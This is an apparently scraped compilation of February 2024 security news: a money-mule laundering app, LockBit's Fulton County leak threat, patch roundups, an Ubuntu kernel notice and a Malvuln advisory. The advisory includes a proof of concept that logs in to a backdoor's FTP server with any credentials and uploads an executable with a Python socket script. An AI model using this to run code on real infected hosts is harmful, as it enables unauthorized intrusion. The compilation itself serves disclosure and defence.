By Deeba Ahmed
Don't confuse the XHelper app with the notorious XHelper malware, which targets Android devices and is notoriously difficult to remove.
This is a post from HackRead.com Read the original post: Android Money Transfer XHelper App Exposed as Money Laundering Network

The XHelper App, an APK found on third-party app stores, has been exposed over its large-scale money laundering operation involving Chinese scammers.

CloudSEK researchers have discovered XHelper, an Android app (not to be confused with the **nasty XHelper malware**) linked to a money laundering network, disguised as legitimate websites for scams like fake payment gateways and illegal gambling.

In October 2023, the CloudSEK Threat Intelligence (TI) team **discovered** a critical loophole in India’s banking infrastructure being exploited by Chinese threat actors in a “large-scale money laundering scheme targeting Indian citizens.” The scheme involved hundreds of thousands of compromised “money mule” accounts, transferring funds back to China.

For your information, **money mules** are individuals involved in fraudulent activities, transferring funds and executing financial crimes like cyber fraud or money laundering. 

Now, according to CloudSEK’s **blog post**, the XHelper app is distributed through websites designed as legitimate Money Transfer Businesses, while funds are converted into cryptocurrencies, and scammers are paid in USDT after deducting commissions. 

The operation involves money mules activating order intake within the XHelper app, receiving/fulfilling money laundering tasks, and executing illicit fund transfers using their linked bank app. Successful order completion results in financial rewards within the app, incentivizing continued participation. 

Money mules are recruited by agents; they operate within a network through multiple Telegram channels. They prefer corporate bank accounts with higher transaction limits as it allows them to move large sums of money more efficiently. 

The Xhelper app features a referral system, allowing agents to invite others and earn bonuses for successful recruitment. This pyramid-like structure amplifies the reach of illicit activities. It is a sophisticated app designed to **facilitate money laundering** across the globe, swiftly managing money mule schemes via deceptive payment systems. The app’s efficient operational framework allows criminals to scale their operations without specialized knowledge.

Furthermore, the app integrates several unique features, including a mule ranking system, which allows cybercriminals to conduct their operations easily. XHelper optimizes recruitment and oversight of money mules, masking illegal fund origins and facilitating quicker transitions from bank accounts to cryptocurrency, hiding the paper trail of **laundered money**.

Xhelper app dashboard, another app like Xhelper and modus operandi of the Xhelper app (Credit: CloudSEC\_

The XHelper app basically “serves as the technological backbone for fake payment gateways used in various scams, such as **Pig Butchering**, Task scams, Loan scams, E-Commerce scams, Illegal gambling apps, etc.,” CloudSEK researchers noted in the report. 

Money mule activities can lead to financial losses and operational strain in banks, requiring additional security measures. Legal and compliance issues may result in fines and penalties. Enhanced transaction monitoring costs increase operational costs, and resource allocation is required for investigations, security measures, and compliance efforts. 

Prevention of such schemes is the only solution. for which financial institutions/banks must enhance security, implement stricter verification protocols for merchant account opening, bolster net-banking security measures with multi-factor authentication, monitor suspicious activity, and educate users on secure practices.

1.  **New Dark Web Market Styx: Focuses on Money Laundering**
2.  **Chinese APT Slid Fake Signal, Telegram Apps onto App Stores**
3.  **Europol nabs 106 criminals for SIM swapping, money laundering**
4.  **Chinese Scammers Exploit Cloned Websites in Gambling Network**
5.  **Chinese Hackers Use Coathanger RAT on Dutch Defense Network**

Android Money Transfer XHelper App Exposed as Money Laundering Network

Apple’s newest encryption technology, called PQ3, now secures iMessages with end-to-end encryption that is quantum-resistant.

Thursday, February 29, 2024 14:00

Apple released a new update for nearly all its devices that provides an all-new type of encryption for its iMessages to the point that, in theory, iMessages are now protected against attacks from quantum computers.  

This is a little tricky because, as we’ve covered before, quantum computers don’t exist yet, and we don’t really know when they might. 

Apple’s newest encryption technology, called PQ3, now secures iMessages with end-to-end encryption that is quantum-resistant. Signal, the secure messaging app of choice for many, launched quantum-resistant encryption for its service in September with its protocol called PQXDH. 

In a blog post, Apple called this update the “most significant cryptographic security upgrade in iMessage history.” 

To the average user, it’s probably tough to fully understand what this means. Private companies and governments are still pouring billions of dollars into developing quantum computers, and it’s more of a theory than a reality. We still don’t know a lot about quantum computing, and whether it could eventually be deployed in a scalable and responsible manner. The second one is created, though, it’s a safe bet that it’s going to fall into the wrong hands. 

Having these protections in place now is a huge step toward the U.S. National Institutes of Standards and Technology’s goal of creating post-quantum encryption everywhere. But change, as we all know, is slow, and it’s too early to start celebrating the idea that we’re all safe from the downsides of quantum computing.  

Eventually, every service, product, etc. that relies on public key infrastructure like SSL and TLS will need to re-examine how they operate and start integrating quantum-resistant algorithms. Think about how long it’s taken our network infrastructure to move from IPv4 to IPv6, and how IPv4 still routes most of today’s internet traffic.  

Then, compare that to Apple and Signal, who get to roll out automatic updates to their users. It’s no guarantee that users are going to install these patches, but most will update their devices overnight without them even noticing, or they’ll just install the update to finally get the pop-up notifcation to go away. Others won’t have that same benefit. 

Deploying PQC to a messaging app is easy enough, next we’ll have to hope that vendors who support web browsers, email clients, wireless routers AND those messaging apps are all on the same page so we can hopefully avoid overwhelming IT teams when we do enter the age of quantum computing.  

**The one big thing **

Cisco Talos researchers have uncovered new details about the tooling and command and control servers used by the Turla APT. The infamous Russian state-sponsored actors was recently spotted spreading the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. Talos also discovered the use of three other malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting. One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems. 

**Why do I care? **

Turla is a well-known group that has most recently been seen targeting non-governmental organizations (NGOs) in Poland. Talos’ research found that Turla’s new backdoor code is different than its predecessors, which means defenders need to change up their detection methods, too. Our researchers partnered with Cert NGO, an incident response service in Poland, to disclose this information, so potential victims in Poland are now better protected and prepared for this activity.  

**So now what? **

Talos has released new IOCs to provide defenders with new ways to block this actor. Turla also has tools for elevated process execution and credential harvesting, so ensuring that your organization utilizes the principle of least privilege can go a long way toward preventing these attacks. 

**Top security headlines of the week **

**The FBI and other international law enforcement agencies partnered to take down the LockBit ransomware gang’s leak site that it used to extort its victims.** However, several days after the announcement, the group announced it was back online and launched what appears to be a new leak site. As part of the takedown effort, the agencies released new decryption software for victims of LockBit and arrested two suspected operators in Poland and Ukraine at the request of French authorities. The leak site’s page was replaced with information on the decryption key, press releases from the involved law enforcement agencies, charging documents and more. However, after the weekend, LockBit claimed it was back and invited affiliates to re-join its infrastructure. They even returned to extorting one of their current victims, Fulton County, Georgia. Representatives from the Fulton County government said on Monday that the group “re-established a site on the dark web and have once again listed Fulton County as one of their victims, with a renewed threat to release purportedly stolen data.” (CNN, SecurityWeek, WSB-TV) 

**Microsoft expanded its free logging services last week to now provide offerings for all U.S. federal agencies.** The move comes after Chinese state-sponsored actors stole a Microsoft signing key and used it to spy on the emails of U.S. lawmakers last year. Previously, the company charged its cloud services customers extra for access to security logs that could have detected these types of intrusions. Now, they’re available for free. It’s also increasing the default log retention period from 90 days to 180 days (the minimum that Cisco Talos Incident Response has recommended in the past) for logs. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a statement that it worked with Microsoft, the Office of Management and Budget (OMB) and the Office of the National Cyber Director (ONCD) to roll this program out to select agencies over the past six months. CISA also released a new log management playbook for agencies that “provides further detail on each newly available log and how these logs can be used to support threat hunting and incident-response operations.” (CISA, CyberScoop) 

**U.S. President Joe Biden signed an executive order on Wednesday designed to keep U.S. citizens’ personal information from being sold to companies and organizations in Russia and China,** two of the U.S.’s largest opponents in cyberspace. The executive order identified so-called “countries of concern” where U.S. firms could face punishments for selling personal information to, even if it was collected legitimately. However, the enforcement mechanisms for this must be created and installed, which could take months or longer. The Biden administration hopes to limit foreign entities or foreign-controlled companies that operated in the U.S. from improperly collecting sensitive data. This data includes things like biometrics, health data and geolocation. American lawmakers have long expressed concern that data sold by brokers or even stolen in cyber attacks could be used to spy or blackmail sensitive targets in the U.S., such as government officials and military leaders. Data brokers are legal in the U.S. They usually collect and categorize personal information on users, usually building profiles on them that can be sold to advertisers, social media companies, and more for personalized targeting. (Associated Press, Bloomberg) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #173: The tl;dr of NIS2 
*   Multiple vulnerabilities in Adobe Acrobat Reader could lead to remote code execution 
*    Stop running security in passive mode 
*   Talos Takes Ep. #144: The Reverberations of Volt Typhoon 
*   Google Cloud Run Is ‘Being Abused’ By Cyberattacks Via Microsoft Installers: Cisco Report 

**Upcoming events where you can find Talos **

**BSides Sofia 2024** **(March 23 - 24)** 

_Sofia, Bulgaria_

**S4x24** **(March 24 - 27)** 

Miami Beach, Florida 

_To protect themselves during Russian aggression, the Ukrainian military utilizes electronic warfare to blanket critical infrastructure to defeat radar and GPS-guided smart munitions. This has the unintended consequence of disrupting GPS synchrophasor clock measurements and creating service outages on an already beleaguered and damaged transmission electric grid. Joe Marshall from Talos’ Strategic Communications team will tell an incredible story of how a group of engineers and security professionals from a diverse coalition of organizations came together to solve this electronic warfare GPS problem in an unconventional technical way, and helped stabilize parts of the transmission grid of Ukraine._ 

**RSA** **(May 6 - 9)** 

_San Francisco, California_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934   
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c   
**Typical Filename:** Wextract   
**Claimed Product:** Internet Explorer   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc   
**MD5:** 4813fa6d610e180b097eae0ce636d2aa   
**Typical Filename:** xmrig.exe   
**Claimed Product:** XMRig   
**Detection Name:** Trojan.GenericKD.70491190 

**SHA 256:** a75004c0bf61a2300258d99660552d88bf4e1fe6edab188aad5ac207babcf421   
**MD5:** c44f8ef0bbaeee256bfb62561c2a17db   
**Typical Filename:** ggzokjcqkgcbqiaxoohw.exe   
**Claimed Product:** N/A    
**Detection Name:** Symmi:GenMalicious-tpd 

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa     
**MD5:** df11b3105df8d7c70e7b501e210e3cc3     
**Typical Filename:** DOC001.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201

Why Apple added protection against quantum computing when quantum computing doesn’t even exist yet

The notorious LockBit gang promised a Georgia court leak "that could affect the upcoming US election.” It didn't materialize—but the story may not be over yet.

This week, the notorious ransomware gang known as LockBit threatened a kind of disruption that would have been a first even for a criminal industry that has crippled hospitals and triggered the shutdown of a gas pipeline: leaking documents from the criminal prosecution of a former president and presidential candidate.

Then, without explanation, that threat evaporated, leaving plenty of unanswered questions behind.

For the past five days, LockBit promised on its dark-web site to publish data stolen from the Fulton County, Georgia, government, which it listed as one of its extortion victims, unless the county paid an unspecified ransom. One administrator for the group went so far as to post the specific threat of releasing documents related to Fulton County's high-profile prosecution of Donald Trump: the Superior Court of Fulton County is the venue where Trump, the Republican presidential front-runner, stands accused of a criminal conspiracy to interfere in the 2020 election.

Yet when the hacker group's own deadline for that leak arrived, no documents appeared. Instead, LockBit mysteriously removed any mention of it from its website. Fulton County officials have denied paying a ransom—which leaves unanswered why the leak disappeared, and whether LockBit still holds any of the court's documents or ever did in the first place.

“We’re not aware of any data having been released today so far,” Fulton County Commission Chairman Robb Pitts said in a Thursday afternoon press conference. “Now that being said, that does not mean the threat is over by any means, and they could release whatever data they have at any time, today, tomorrow or any time in the future. We have no control over that."

The ransomware crew's threat, before it vanished, had been dramatically timed: It followed a coordinated law enforcement takedown operation targeting LockBit just last week. Known as Operation Chronos and led by the UK's National Crime Agency, the operation took control of much of LockBit's infrastructure, seized hundreds of its cryptocurrency wallets, tore down the dark-web sites it uses in its extortion campaigns, and even claimed to have compromised some of its members and partners. Just days later, however, LockBit managed to launch a new dark-web site, where it posted a list of victims along with countdown timers for each representing their deadline to pay a ransom before the hackers leaked their stolen data. The deadline for the Fulton County documents had been set for February 29 at 1:49 pm UTC.

On that relaunched site, one LockBit administrator also posted a lengthy screed accusing the FBI of timing the takedown specifically to prevent the release of the Trump-related Fulton County court documents—and promising to release them despite the bust if Fulton County didn't pay.

“The FBI decided to hack now for one reason only, because they didn't want to leak information from \[the Fulton County government website\],” the LockBit administrator wrote. “The stolen documents contain a lot of interesting things and Donald Trump's court cases that could affect the upcoming US election.”

The hacking-related paralysis of Fulton County's government, at least, seems to be very real: By its own admission, the county government is facing a serious and ongoing network disruption that looks very much like a ransomware attack. The website for Fulton County's government has noted in an alert on its homepage for nearly a week that it's “experiencing an unexpected IT outage currently affecting multiple systems” and that systems related to everything from phone lines to tax collection to courts had been affected. An official who answered the phone at the county's publicly listed phone line tells WIRED the outage had begun as early as late January. But a county government spokesperson declined WIRED's request for more information on the attack.

The LockBit hackers also posted some convincing sample documents that appeared to have been stolen from the Fulton County court systems prior to the takedown last week, according to Georgia-based reporter George Chidi, who wrote about the incident earlier this month. Chidi reported seeing documents that included court files and even documents under seal in specific cases, though none appeared to be related to Trump’s prosecution.

Then, on Wednesday, just hours before LockBit's deadline for the county to pay its ransom expired, the countdown timer for that leak on Lockbit's website froze, with an added line of text that read, “Timer stopped.” At the promised time of 1:49 PM UTC Thursday, the leak failed to materialize. Instead, all mention of Fulton County was removed from LockBit's extortion threat site.

In Thursday's press conference, Fulton County Chairman Rob Pitts denied that the county had paid Lockbit's extortion fee. “We have not paid any ransom, nor has any ransom been paid on our behalf,” Pitts said.

LockBit instead may well be bluffing—either it doesn't have the goods it claims or isn't ready to give up on its extortion demand. Robert McArdle, a researcher who leads a cybercrime-focused research team at security firm Trend Micro and was involved in the law enforcement operation against LockBit, says the group's thus-far empty threat is a sign that it was likely more disrupted by the bust than it wants to admit.

“This appears to be further evidence of the difficulties facing LockBit ever since Op Chronos took place, and should be considered as a sign they are unable to reliably follow through on their statements,” says McArdle. He points out that the victims listed on the group's new dark-web site were all compromised prior to Operation Chronos and that continuing to threaten them is the group's attempt to “appear as if everything is normal when most evidence points very much to the contrary.”

There remain other theories, however, that Lockbit might still possess the court's data but is seeking to use it in some other way. “They generally don't lie about victims, because they're so worried about their reputation,” says Jon DiMaggio, the ransomware-focused chief security strategist at cybersecurity firm Analyst1. He notes that the decision to take down the leak threat may have been the decision of the “affiliate” hackers who partner with LockBit to penetrate victims like Fulton County and may have different motivations from LockBit itself.

If Fulton County documents do remain in the hands of hackers, and if any of them relate to the Trump case, they could further complicate an already deeply messy trial. The state's case has been rocked by allegations that the prosecutor in the case, Fulton County district attorney Fanni Willis, had an improper affair with another prosecutor involved in Trump's prosecution, which the defense has argued should require Willis’ dismissal. The compromise of non-public documents in the case could make the proceedings—and the upcoming US presidential election—even more chaotic.

“We're watching with interest to see how the Fulton leak develops,” Trend Micro’s McArdle says. So, no doubt, will the US political sphere—including a certain former president.

_Additional reporting by Matt Burgess._

_Updated 2/29/2024, 4:15 pm EST with a statement from Fulton County Commission Chairman Robb Pitts._

The Mysterious Case of the Missing Trump Trial Ransomware Leak

Plus: Mozilla patches 12 flaws in Firefox, Zoom fixes seven vulnerabilities, and more critical updates from February.

CVE-2024-1553 and CVE-2024-1557 are memory-safety bugs rated as having a high severity. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla researchers said.

Zoom

Video conferencing giant Zoom has issued fixes for seven flaws in its software, one of which has a CVSS score of 9.6. CVE-2024-24691 is an improper-input-validation bug in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows. If exploited, the issue may allow an unauthenticated attacker to escalate their privileges via network access, Zoom said in a security bulletin.

Another notable flaw is CVE-2024-24697, an untrusted-search-path issue in some Zoom 32 bit Windows clients that could allow an authenticated user with local access to escalate their privileges.

Ivanti

In January, Ivanti warned that attackers were targeting two unpatched vulnerabilities in its Connect Secure and Policy Secure products, tracked as CVE-2023-46805 and CVE-2024-21887. With a CVSS score of 8.2 the first authentication-bypass vulnerability in the web component of Ivanti Connect Secure and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

With a CVSS score of 9.1, the second command injection vulnerability in web components of Ivanti Connect Secure and Ivanti Policy Secure allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. This vulnerability can be exploited over the internet.

At the end of the month, the firm alerted companies to another two serious flaws, one of which was being exploited in attacks. The exploited issue is a server-side request forgery bug in the SAML component tracked as CVE-2024-21893. Meanwhile, CVE-2024-21888 is a privilege-escalation vulnerability.

Patches were available by February 1, but the issues were deemed so serious that the US Cybersecurity and Infrastructure Security Agency (CISA) advised disconnecting all Ivanti products by February 2.

On February 8, Ivanti released a patch for yet another issue tracked as CVE-2024-22024, which prompted another CISA warning.

Fortinet

Fortinet has issued a patch for a critical issue with a CVSS score of 9.6, which it says is already being used in attacks. Tracked as CVE-2024-21762, the code-execution flaw impacts FortiOS versions 6.0, 6.2, 6.4, 7.0, 7.2 and 7.4. The out-of-bounds write vulnerability can be used for arbitrary code execution using specially crafted HTTP requests, Fortinet said.

It came just days after the firm released a patch for two issues in its FortiSIEM products, CVE-2024-23108 and CVE-2024-23109, rated as critical with a CVSS score of 9.7. The flaw in FortiSIEM Supervisor could allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests, Fortinet said in an advisory.

Cisco

Cisco has listed multiple vulnerabilities in its Expressway Series that could allow an unauthenticated, remote attacker to conduct cross-site request forgery attacks.

Tracked as CVE-2024-20252 and CVE-2024-20254, two vulnerabilities in the API of Cisco Expressway Series devices have been given a CVSS score of 9.6. “An attacker could exploit these vulnerabilities by persuading a user of the API to follow a crafted link,” Cisco said. “A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user.”

SAP

Enterprise software firm SAP has released 13 security updates as part of its SAP Security Patch Day. CVE-2024-22131 is a code-injection vulnerability in SAP ABA with a CVSS score of 9.1.

CVE-2024-22126 is a cross-site scripting vulnerability in NetWeaver AS Java listed as having a high impact, with a CVSS score of 8.8. “Incoming URL parameters are insufficiently validated and improperly encoded before including them into redirect URLs,” security firm Onapsis said. “This can result in a cross-site scripting vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.”

Here Are the Google and Microsoft Security Updates You Need Right Now

By Uzair Amir
VPN or Residential Proxies: Which is best? Let's explore without diving into technical details.
This is a post from HackRead.com Read the original post: Exploring the Differences Between Residential Proxies and VPNs: Which is Right for You?

While both serve similar purposes, there are specific differences between residential proxies and VPNs that users should understand to make informed decisions about their online privacy.

Today, cyber threats and stalking are major issues making privacy and security two major concerns for internet users. With the increasing prevalence of online threats and surveillance, many individuals and businesses are turning to tools like residential proxies and Virtual Private Networks (VPNs) to protect their online activities.

While both serve similar purposes, there are specific differences between residential proxies and VPNs that users should understand to make informed decisions about their online privacy.

****Understanding Residential Proxies:****

Residential proxies are IP addresses provided by Internet Service Providers (ISPs) to homeowners. These proxies act as intermediaries between a user’s device and the internet, masking the user’s real IP address with one associated with a residential location. Residential proxies come in two main forms: those provided directly by ISPs and those offered by third-party providers.

****Residential Proxies Provided by ISPs:****

When ISPs assign IP addresses to residential customers, they essentially allocate a pool of addresses that users can utilize. These addresses are genuine and tied to physical locations, making them highly valuable for tasks such as web scraping, market research, and ad verification.

****Residential Proxies Provided by Third-Party Providers:****

In addition to the proxies offered by ISPs, there are also third-party providers who issue residential IP addresses from ISPs and offer them to users for various purposes. These third-party residential proxies often come with additional features and customization options to suit different use cases.

****Understanding VPNs:****

A Virtual Private Network (VPN) is a service that encrypts a user’s internet connection and routes it through a server operated by the VPN provider. This creates a secure and private tunnel between the user’s device and the internet, masking their IP address and encrypting their data in transit.

**The Main Differences:**

While both residential proxies and VPNs provide users with increased privacy and security online, there are several key differences between the two:

*   **IP Address Ownership**: Residential proxies use IP addresses assigned by ISPs to homeowners, whereas VPNs use IP addresses owned by the VPN provider and shared among multiple users.
*   **Anonymity and Geolocation**: Residential proxies provide a higher level of anonymity and are associated with specific geographical locations, making them ideal for tasks requiring location-specific data. VPNs, on the other hand, offer anonymity by masking the user’s IP address with one from the VPN server, but they may not always offer specific location options.
*   **Usage and Purpose**: Residential proxies are often used for web scraping, market research, ad verification, and similar tasks that require genuine residential IP addresses. VPNs are more commonly used for general internet browsing, accessing geo-restricted content, and enhancing security on public Wi-Fi networks.

****Protecting Online Privacy:****

Both residential proxies and VPNs offer valuable tools for protecting online privacy and security. Residential proxies are ideal for tasks requiring genuine residential IP addresses and specific geographical locations, while VPNs provide a more general solution for encrypting internet connections and masking IP addresses.

In conclusion, the choice between residential proxies and VPNs depends on the specific needs and use cases of the user. Whether it’s collecting data for market research, accessing geo-restricted content, or simply browsing the web securely, understanding the differences between these two tools can help users make informed decisions about protecting their online privacy.

1.  **Tools for Testing Your Proxy Servers**
2.  **Proxy or VPN for Netflix – Which is Best?**
3.  **Can You Secure Your Smartphone with a Proxy?**
4.  **Almost Every Major Free VPN Service is a Glorified Data Farm**
5.  **What is Dark Web, Search Engines, What Not to Do on Dark Web**

Exploring the Differences Between Residential Proxies and VPNs: Which is Right for You?

By Deeba Ahmed
The scammers creates fake investment platforms using popular companies like Tesla, Meta, and Imperial Oil and lures unsuspecting users into depositing funds.
This is a post from HackRead.com Read the original post: Savvy Seahorse Using Fake ChatGPT, Facebook Ads in DNS Investment Scam

Infoblox cybersecurity researchers are warning users about a fraudulent scheme launched by a DNS threat actor Savvy Seahorse, which uses Facebook advertisements to trick users into fraudulent investment platforms and transfers deposits to Russian-state-owned banks.

California-based IT automation and security company Infoblox has discovered a relatively new DNS threat actor called “Savvy Seahorse.” According to the company’s report, the actor creates fake investment platforms using popular icons like Tesla, Meta, and Imperial Oil and lures unsuspecting users into depositing funds. 

Savvy Seahorse prefers using Facebook ads to trick users into trusting fake investment platforms and transfers deposits to Russian-state-owned banks. Savvy Seahorse employs advanced techniques like fake ChatGPT and WhatsApp bots to lure users into high-return investment scams, which are the costliest category of threat reported to the FBI’s Internet Crime Complaint Center.

ChatGPT and WhatsApp bots engage users through automated responses for high-return investment opportunities. These campaigns target users in various countries, including Russian, Polish, Italian, German, Czech, Turkish, French, Spanish, and English speakers but interestingly users in Ukraine are protected. 

Through DNS canonical name (CNAME) records, the actor creates a traffic distribution system (TDS) for conducting sophisticated financial scams, controlling access to content and updating the IP addresses of malicious campaigns. This also helps them evade detection by the security industry. It is worth noting that Savvy Seahorse, active since 2021, is the first publicly reported threat actor abusing DNS CNAME records for sophisticated scam campaigns.

In a blog post, Infoblox researchers have identified several red flags associated with the Savvy Seahorse scam. These include short-lived campaigns (active for only 5-10 days), using a phased deployment system, frequent changes in IP addresses (to complicate/block tracking of malicious infrastructure), and the use of wildcard DNS entries.

These entries entail creating numerous subdomains, potentially confusing passive DNS analysis. These characteristics make it difficult to track and block malicious infrastructure. Victims’ data is sent to a secondary HTTP-based TDS server for validation and geofencing.

Around 4.2k base domains with CNAME records are used by Savvy Seahorse to host campaigns, Infoblox researchers confirmed. The attackers create subdomains for each SLD using a domain generation algorithm, using pseudo-random hostnames. Registration forms are used to gather victim information, and after validating it, they are redirected to the fake trading platform. The actor monitors users to prevent security threats.

The scam poses potential risks to individuals, including financial loss, data theft, and malware infection. Users who invest in the fake platform may lose their funds, while the scammers may steal personal and financial information.

Therefore, consumers must be vigilant when trusting unverified sources for making deposits. Remember that the US cumulatively lost over $4.6 billion in 2023 over investment scams.

1.  **WhatsApp Pink is malware spreading through group chats**
2.  **Thousands of Dark Web Posts Expose ChatGPT Abuse Plans**
3.  **China Arrests 4 Who Weaponized ChatGPT for Ransomware Attacks**
4.  **Fake Telegram, WhatsApp clones aim at crypto on Android, Windows**
5.  **SpyNote Android Spyware Poses as Legit Crypto Wallets, Steals Funds**

Savvy Seahorse Using Fake ChatGPT, Facebook Ads in DNS Investment Scam

Ubuntu Security Notice 6653-2 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6653-2  
February 28, 2024

linux-aws, linux-aws-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-aws: Linux kernel for Amazon Web Services (AWS) systems  
- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems

Details:

It was discovered that a race condition existed in the ATM (Asynchronous  
Transfer Mode) subsystem of the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-51780)

It was discovered that a race condition existed in the AppleTalk networking  
subsystem of the Linux kernel, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-51781)

Zhenghan Wang discovered that the generic ID allocator implementation in  
the Linux kernel did not properly check for null bitmap when releasing IDs.  
A local attacker could use this to cause a denial of service (system  
crash). (CVE-2023-6915)

Robert Morris discovered that the CIFS network file system implementation  
in the Linux kernel did not properly validate certain server commands  
fields, leading to an out-of-bounds read vulnerability. An attacker could  
use this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2024-0565)

Jann Horn discovered that the TLS subsystem in the Linux kernel did not  
properly handle spliced messages, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2024-0646)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1055-aws     5.15.0-1055.60  
   linux-image-aws-lts-22.04       5.15.0.1055.54

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1055-aws     5.15.0-1055.60~20.04.1  
   linux-image-aws                 5.15.0.1055.60~20.04.42

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6653-2  
   https://ubuntu.com/security/notices/USN-6653-1  
   CVE-2023-51780, CVE-2023-51781, CVE-2023-6915, CVE-2024-0565,  
   CVE-2024-0646

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1055.60  
   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1055.60~20.04.1

Ubuntu Security Notice USN-6653-2

Backdoor.Win32.Agent.amt malware suffers from bypass and code execution vulnerabilities.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2a442d3da88f721a786ff33179c664b7.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Agent.amtVulnerability: Authentication BypassDescription: The malware can run an FTP server which listens on TCP port 2121. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders can then upload executables using ftp PASV, STOR commands, this can result in remote code execution.Family: AgentType: PE32MD5: 2a442d3da88f721a786ff33179c664b7Vuln ID: MVID-2024-0673Disclosure: 02/28/2024 Exploit/PoC:C:\sec>nc64.exe 192.168.18.125 2121220 Welcome To mybr Ftp!USER gg331 Password required for gg.PASS gg230 User gg logged in.SYST215 UNIX Type: L8 Internet Component SuiteCDUP250 CWD command successful. "C:/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,211,164).STOR DOOM_SM.exe150 Opening data connection for DOOM_SM.exe.226 File received okfrom socket import *import timeHOST = "192.168.18.125"PORT = 54180BUF_SIZE = 32s=socket(AF_INET, SOCK_STREAM)s.connect((HOST, PORT))with open("DOOM_SM.exe", "rb") as f:    while True:         bytez = f.read(BUF_SIZE)        if not bytez:            break        s.send(bytez)        time.sleep(0.5)print("By malvuln")s.close()1/23/2024 9:13:03 PM - gg - 0.0.0.0 Disconnected1/23/2024 9:10:36 PM - gg - 0.0.0.0 STOR C:\DOOM_SM.exe1/23/2024 9:09:54 PM - gg -  PASV C:\1/23/2024 9:09:44 PM - CD C:\1/23/2024 9:09:44 PM - gg -  CDUP C:\1/23/2024 9:09:18 PM - gg -  SYST C:\1/23/2024 9:09:15 PM - gg1/23/2024 9:09:15 PM - gg -  PASS C:\TEMP\hate1/23/2024 9:09:12 PM -  -  USER C:\TEMP\gg1/23/2024 9:09:06 PM -  -  Connected1/23/2024 9:08:58 PM - FTP StartedDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.amt MVID-2024-0673 Authentication Bypass / Code Execution

Backdoor.Win32.Jeemp.c malware suffers from a hardcoded credential vulnerability.

